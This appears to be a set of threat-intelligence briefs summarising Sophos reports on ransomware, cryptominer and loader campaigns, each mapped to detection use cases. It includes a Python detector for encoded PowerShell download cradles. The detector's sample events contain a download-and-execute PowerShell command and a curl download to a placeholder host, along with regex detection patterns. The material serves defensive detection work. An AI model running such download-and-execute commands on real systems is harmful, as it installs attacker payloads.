Cerber Ransomware Exploits Confluence Vulnerability

June 21, 2022

 


Industry: N/A | Level: Tactical | Source: Sophos

Sophos, tracking the Confluence vulnerability CVE-2022-26134, has found that the attack surface is shrinking as fewer vulnerable Confluence servers are identified. However, Sophos observed two exploit attempts targeting Windows servers with the objective of deploying Cerber ransomware. The observed activity involved the attackers running curl and PowerShell commands on the affected host. The PowerShell command was initially encoded and contained instructions to download and execute a payload saved in the %temp% folder. The attack was unsuccessful and mitigated, with no evidence of exfiltration or lateral movement.

Anvilogic Use Cases:

  • Invoke-WebRequest Command
  • Encoded Powershell Command
  • Invoke-Expression Command
  • Executable Process from Suspicious Folder

Attackers Exploit Telerik UI to Deliver Cryptominer and Cobalt Strike

June 21, 2022

 


Industry: N/A | Level: Tactical | Source: Sophos

Sophos researchers noticed attackers reusing the same tactics, techniques, and procedures (TTPs) when exploiting the Telerik UI vulnerability CVE-2019-18935 to deliver Cobalt Strike and then download additional payloads. The attack pattern has remained consistent since the vulnerability was disclosed, as Sophos shared: “In the incidents we investigated, the threat actor exploited the vulnerability (designated CVE-2019-18935) to deliver a Cobalt Strike beacon (in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malware, and established persistence on the servers through some novel methods.” The observed attack chain commenced with exploitation of the Telerik UI vulnerability to deliver a Cobalt Strike DLL payload, which often landed in the C:\Windows\Temp directory. The attacker then ran encoded PowerShell commands to download and execute additional malware from the command and control server. Malware downloaded to the victim’s host included an executable that injects itself into cmd.exe, the XMRig cryptominer, and a JSON configuration file for cryptomining. In a different environment exploited through the same Telerik UI vulnerability, a similar attack pattern was observed; however, the attacker also established persistence through group policy objects and a scheduled task. The threat actor responsible for the attacks is currently unknown. While there is a correlation with the Blue Mockingbird threat actor, which exploited CVE-2019-18935 in May 2020, many of that group’s typical TTPs were absent in the observed incidents.

Anvilogic Scenario:

  • Cobalt Strike or GPO leads to PowerShell & Cryptomining

Anvilogic Use Cases:

  • Cobalt Strike Beacon
  • Suspicious File written to Disk
  • Modify Registry Key
  • Modify Group Policy
  • Suspicious Executable by CMD.exe
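Both the Cerber and the Telerik UI write-ups above share the same detectable step: an encoded PowerShell command (or curl) that downloads a payload into a temp folder and executes it. The following detector is an added example, not code from Sophos or Anvilogic; it decodes a -EncodedCommand argument (base64 of UTF-16LE) and tags the behaviours over constructed sample process command lines, with placeholder hostnames rather than real indicators.

```python
import base64
import re
from typing import List, Optional

# Patterns for the behaviours described in the Cerber and Telerik write-ups.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I)
EXECUTE = re.compile(r"invoke-expression|\biex\b|start-process", re.I)
TEMP_PATH = re.compile(r"%temp%|\$env:temp|\\appdata\\local\\temp\\|\\windows\\temp\\", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or return None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a decodable blob; the caller inspects the raw command line


def classify(cmdline: str) -> List[str]:
    """Return the behaviour tags matched by one process-creation command line."""
    tags = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded_powershell")
        text = decoded  # inspect the decoded script, not the base64 blob
    if DOWNLOAD.search(text):
        tags.append("download_cradle")
    if EXECUTE.search(text):
        tags.append("invoke_expression")
    if TEMP_PATH.search(text):
        tags.append("temp_folder_payload")
    return tags


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (used for the sample below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (hypothetical; the .invalid hostname is a placeholder).
SAMPLE_SCRIPT = "Invoke-WebRequest http://x.invalid/p.exe -OutFile $env:temp\\p.exe; Start-Process $env:temp\\p.exe"
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -enc " + encode_ps(SAMPLE_SCRIPT),  # Cerber-style chain
    "curl http://x.invalid/x -o C:\\Windows\\Temp\\x.exe",             # curl into Windows\Temp
    "powershell.exe -File C:\\scripts\\backup.ps1",                    # benign admin script
]
```

Running `classify` over each entry in SAMPLE_EVENTS tags the first two and leaves the benign script untagged; in production the tags would feed the Encoded PowerShell, Invoke-WebRequest, and Suspicious Folder use cases listed above.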

Financial Fraud with Exchange Vulnerabilities

February 22, 2022


Industry: N/A | Level: Tactical | Source: Sophos

The malware loader Squirrelwaffle emerged in September 2021 and continues to spread by exploiting the Microsoft Exchange ProxyLogon and ProxyShell vulnerabilities. Sophos observed hijacked emails being used to advance the spread of Squirrelwaffle, and its investigations also identified attackers committing financial fraud using information obtained from the hijacked emails. The hijacked emails contained customer payment information; the attackers created a “typo-squatted” domain and sent fraudulent replies to an email thread requesting assistance, in a manner that gave them access to the victim’s payments.

  • Anvilogic Use Case: Potential ProxyShell

Midas Ransomware

February 01, 2022


Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported the deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators identified that the attackers had been active on the network for at least two months, with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was unfortunately simple, following a flat topology with no network segmentation. The attackers also took advantage of the commercial remote access tools AnyDesk and TeamViewer to move laterally in the network, as the organization had previously used the software for tests but had not uninstalled it from the servers. A unique aspect of the compromise identified by Sophos involves the attackers crafting and installing PowerShell scripts as services prior to deploying the ransomware; this activity was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained admin permissions. Threat activity progressed slowly from October 13th to November 2nd and picked up again on November 25th, with ransomware deployment on December 7th. Observed threat activity on the network included using Process Hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories, and exfiltration of data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder

Emotet and App Installer

December 01, 2021


Industry: N/A | Level: Tactical | Sources: Twitter – @malware_traffic & BleepingComputer

Sophos reported on November 11th, 2021 that Emotet malware is following the same tactics used by Bazarloader to abuse Windows App Installer packages, according to Twitter security researcher @malware_traffic. The attack chain starts with an email from a stolen reply chain containing a URL link to an alleged PDF document. The link leads to a Google Drive-styled page, where a download occurs for a file hosted on Microsoft Azure URLs at .web.core.windows.net. Following the install of an alleged Adobe PDF component, a DLL file is downloaded to the %Temp% folder and executed with rundll32; additionally, an autorun entry is created.

  • Anvilogic Scenario: Malware & AppInstaller
  • Anvilogic Use Cases:
    • AppInstaller.exe Download
    • New AutoRun Registry Key

Memento Team, Ransomware Gang

November 23, 2021


Industry: N/A | Level: Operational | Source: Sophos

The ransomware gang Memento Team was observed by Sophos to have bypassed encryption protection by using password-protected WinRAR archives after the group’s initial Python 3.9 script was stopped by endpoint protection. The group was active in the victim’s network for a long time, with a six-month dwell time from initial access in April 2021, when it exploited CVE-2021-21972, a vCenter vulnerability. During the threat actor’s time on the compromised network, they also deployed two coin-miners, XMR on May 18th and XMRig on September 8th, which led to the victim’s network being encrypted with a password archive in October.

  • Anvilogic Scenario: Memento Team – Behavior